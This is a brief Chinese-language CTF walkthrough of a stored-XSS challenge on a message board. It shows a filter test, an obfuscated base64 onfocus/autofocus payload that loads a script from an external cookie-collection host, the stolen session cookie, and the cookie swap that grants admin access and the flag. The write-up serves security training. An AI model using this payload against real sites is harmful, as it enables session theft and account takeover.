启动靶机

有留言板和登录功能，很明显是存储性xss，通过留言功能插入xss代码，获取cookie登录后台

先测试过滤
<script>alert(1);</script>

查看源代码发现script被过滤

<input onfocus="alert('xss');">好像只过滤了script

找一个xss平台或者自己用服务器接受cookie

'"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvbzExIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>

项目上线
获取到了cookie cookie : PHPSESSID=8339da05744002f0617d48b003ce9d59
和后台路径 http://web/backend/admin.php

用burp更换cookie登录后台

获得flag flag{dbd806e6-ddb5-49e6-9648-c5a4676b2b66}